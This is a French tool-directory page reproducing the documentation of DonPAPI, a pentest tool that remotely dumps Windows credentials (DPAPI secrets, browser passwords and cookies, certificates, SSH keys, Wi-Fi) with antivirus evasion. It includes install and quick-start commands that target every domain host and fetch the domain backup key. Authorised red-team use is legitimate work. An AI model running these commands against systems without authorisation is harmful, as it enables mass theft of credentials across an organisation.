Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
DonPAPI — Dump automatisé de credentials à distance pour environnements Windows, extrayant les secrets DPAPI, les identifiants de navigateur, les certificats et les fichiers de configuration avec évasion de défense intégrée et un visualiseur de butin basé sur le web. | Kitploit
Outils/GitHubGitHub/login-securite/donpapi
Cassage de Mots de PasseCollecte d'InformationsPost-ExploitationTests d'IntrusionAuthentificationRed Teaming
GitHublogin-securite/donpapi

DonPAPI

Dump automatisé de credentials à distance pour environnements Windows, extrayant les secrets DPAPI, les identifiants de navigateur, les certificats et les fichiers de configuration avec évasion de défense intégrée et un visualiseur de butin basé sur le web.

Voir le dépôt
1.4k16022il y a 21 joursVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

DonPAPI

DonPAPI automatise le dump de secrets à distance sur plusieurs ordinateurs Windows, en intégrant l'évasion défensive.

DonPAPI Logo

Identifiants collectés :

  • Identifiants du navigateur Chromium, Cookies et Chrome Refresh Token
  • Certificats Windows
  • Gestionnaire d'identifiants
  • Identifiants et cookies du navigateur Firefox
  • Identifiants Mobaxterm
  • Identifiants MRemoteNg
  • Identifiants RDC Manager
  • Fichiers sur le Bureau et le dossier Récent
  • Identifiants SCCM
  • Identifiants des coffres
  • Identifiants VNC
  • Identifiants WiFi

Nous avons donné une conférence en français sur DPAPI intitulée DPAPI - Don't Put Administration Passwords In 🇫🇷 :

  • Slides

Table des matières

  • DonPAPI
    • Installation
    • Quick Start
    • Usage
      • collect
        • Authentication
        • Collection
        • OPSEC
        • Recover
        • Keep Collecting
      • gui
        • Web
        • Functionalities
    • Disclaimer
    • Credits

Installation

Cet outil doit être installé avec pipx ou dans un environnement virtuel dédié

pipx install donpapi

ou (avec les derniers commits)

pipx install git+https://github.com/login-securite/DonPAPI.git

ou (pour développer)

git clone git+https://github.com/login-securite/DonPAPI.git
cd DonPAPI
poetry update
poetry run DonPAPI

Quick Start

pipx install donpapi
donpapi collect -u admin -p 'Password123!' -d domain.local -t ALL --fetch-pvk
donpapi gui

Usage

usage: DonPAPI [-h] [-v] [-o DIRNAME] {collect,gui} ...

Dump d'informations pertinentes sur des cibles compromises sans détection antivirus. Version: 2.0.0

positional arguments:
  {collect,gui}         Action DonPAPI
    collect             Dump les secrets sur une liste de cibles
    gui                 Lance un serveur Flask pour parcourir la base de données DonPAPI

options:
  -h, --help            affiche ce message d'aide et quitte
  -v                    Niveau de verbosité (-v ou -vv)
  -o DIRNAME, --output-directory DIRNAME
                        Répertoire de sortie. Défaut : ~/.donpapi/loot/

collect

Cette action est utilisée pour collecter les secrets sur les cibles spécifiées avec -t.

usage: dpp collect [-h] [--keep-collecting seconds] [--threads Number of threads] [--no-config] [-t TARGET [TARGET ...]] [-d domain.local]
                   [-u username] [-p password] [-H LMHASH:NTHASH] [--no-pass] [-k] [--aesKey hex key] [--laps Administrator] [--dc-ip IP address]
                   [-r /home/user/.donpapi/recover/recover_1718281433] [-c COLLECTORS] [-nr] [--fetch-pvk] [--pvkfile PVKFILE]
                   [--pwdfile PWDFILE] [--ntfile NTFILE] [--mkfile MKFILE]

options:
  -h, --help            affiche ce message d'aide et quitte
  --keep-collecting seconds
                        Relance l'attaque contre toutes les cibles après X secondes, X étant la valeur
  --threads Number of threads
                        Nombre de threads (défaut : 50)
  --no-config           Ne pas charger le fichier de configuration donpapi (~/.donpapi/donpapi.conf)

authentication:
  -t TARGET [TARGET ...], --target TARGET [TARGET ...]
                        la ou les IP(s), plage(s), CIDR(s), nom(s) d'hôte, FQDN, fichier(s) contenant une liste de cibles, ALL pour récupérer
                        tous les noms d'hôte des ordinateurs depuis LDAP
  -d domain.local, --domain domain.local
                        Domaine
  -u username, --username username
                        Nom d'utilisateur
  -p password, --password password
                        Mot de passe
  -H LMHASH:NTHASH, --hashes LMHASH:NTHASH
                        Hachages NTLM, format LMHASH:NTHASH
  --no-pass             ne pas demander de mot de passe (utile pour -k)
  -k                    Utiliser l'authentification Kerberos. Récupère les identifiants du fichier ccache (KRB5CCNAME) en fonction des paramètres
                        de cible. Si des identifiants valides ne peuvent être trouvés, ceux spécifiés en ligne de commande seront utilisés
  --aesKey hex key      Clé AES à utiliser pour l'authentification Kerberos (128 ou 256 bits)
  --laps Administrator  Utiliser LAPS pour demander le mot de passe administrateur local. La valeur du paramètre laps est le compte administrateur
                        local utilisé pour la connexion
  --dc-ip IP address    Adresse IP du contrôleur de domaine. Si omis, la partie domaine (FQDN) spécifiée dans le paramètre de cible sera utilisée
  -r /home/user/.donpapi/recover/recover_1718281433, --recover-file /home/user/.donpapi/recover/recover_1718281433
                        Chemin du fichier de récupération. S'il est utilisé, les autres paramètres seront ignorés

attacks:
  -c COLLECTORS, --collectors COLLECTORS
                        Chromium, Certificates, CredMan, Files, Firefox, MobaXterm, MRemoteNG, RDCMan, SCCM, Vaults, VNC, Wifi, All (tous les
                        précédents) (défaut : All)
  -nr, --no-remoteops   Désactiver les opérations distantes (essentiellement pas d'opérations sur le registre distant, pas de credentials système
                        DPAPI)
  --fetch-pvk           Utilisera automatiquement la clé de sauvegarde de domaine depuis la base de données, et si elle n'est pas déjà dumpée, la
                        dumppera sur un contrôleur de domaine
  --pvkfile PVKFILE     Fichier pvk avec la clé de sauvegarde de domaine
  --pwdfile PWDFILE     Fichier contenant username:password qui sera éventuellement utilisé pour déchiffrer les masterkeys
  --ntfile NTFILE       Fichier contenant username:nthash qui sera éventuellement utilisé pour déchiffrer les masterkeys
  --mkfile MKFILE       Fichier contenant les correspondances {GUID}:SHA1 des masterkeys

Authentication

L'authentification fonctionne en spécifiant un domaine avec --domain, un nom d'utilisateur avec --username, et éventuellement un mot de passe avec --password, un hachage avec --hashes, une clé AES avec --aesKey ou un ticket Kerberos au format ccache avec -k (style Impacket). Vous pouvez également vous authentifier via LAPS sur l'ordinateur avec --laps et le nom du compte LAPS local comme valeur de ce paramètre.

Collection

Par défaut, DonPAPI collectera :

  • Chromium : Identifiants du navigateur Chromium, Cookies et Chrome Refresh Token
  • Certificates : Certificats Windows
  • CredMan : Gestionnaire d'identifiants
  • Firefox : Identifiants et cookies du navigateur Firefox
  • MobaXterm : Identifiants Mobaxterm
  • MRemoteNg : Identifiants MRemoteNg
  • RDCMan : Identifiants RDC Manager
  • Files : Fichiers sur le Bureau et le dossier Récent
  • SCCM : Identifiants SCCM
  • Vaults : Identifiants des coffres
  • VNC : Identifiants VNC
  • Wifi : Identifiants WiFi
  • CloudCredentials : Identifiants cloud
  • IDEProjects : Fichiers de projets IDE
  • PasswordManagers : Fichiers de gestionnaires de mots de passe
  • PowerShellHistory : Fichiers d'historique PowerShell
  • RecycleBin : Fichiers de la corbeille
  • SSHSecrets : Fichiers de secrets SSH (clés)
  • VersionControlSystems : Outils de versionnement (git par exemple)
Télécharger l’outil